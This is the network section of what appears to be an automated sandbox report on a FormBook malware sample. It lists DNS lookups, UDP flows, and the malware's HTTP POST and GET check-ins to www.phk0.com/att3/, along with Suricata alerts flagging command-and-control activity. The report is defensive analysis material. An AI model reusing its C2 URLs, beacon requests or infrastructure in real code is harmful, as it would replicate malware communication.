Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.phk0.com |
CNAME
expired.namebright.com
|
3.232.205.82 |
| www.visionchief.com | ||
| www.kenobi.tech | ||
| www.bifboawdq.icu | 47.91.170.222 |
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:56887 164.124.101.2:53
-
192.168.56.101:56977 164.124.101.2:53
-
192.168.56.101:57460 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:65329 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
8.8.8.8:53 192.168.56.101:65329
-
POST
0
http://www.phk0.com/att3/
REQUEST
RESPONSE
BODY
POST /att3/ HTTP/1.1
Host: www.phk0.com
Connection: close
Content-Length: 286
Cache-Control: no-cache
Origin: http://www.phk0.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.phk0.com/att3/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
200
http://www.phk0.com/att3/?7nwlq86p=s6xHIXHwkbkuLkMEuQxW4dJ5qgMEdMcFcUb9+bif01noR916v29hb9QaAtQ7NLpH63SSbDD7&Ppd=Hb08qfEHozY8xx
REQUEST
RESPONSE
BODY
GET /att3/?7nwlq86p=s6xHIXHwkbkuLkMEuQxW4dJ5qgMEdMcFcUb9+bif01noR916v29hb9QaAtQ7NLpH63SSbDD7&Ppd=Hb08qfEHozY8xx HTTP/1.1
Host: www.phk0.com
Connection: close
HTTP/1.1 200 OK
Date: Thu, 19 Aug 2021 10:14:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.101 | 164.124.101.2 | 3 | |
| 192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49210 -> 3.232.205.82:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49210 -> 3.232.205.82:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49210 -> 3.232.205.82:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| UDP 192.168.56.101:61479 -> 164.124.101.2:53 | 2026888 | ET INFO DNS Query for Suspicious .icu Domain | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts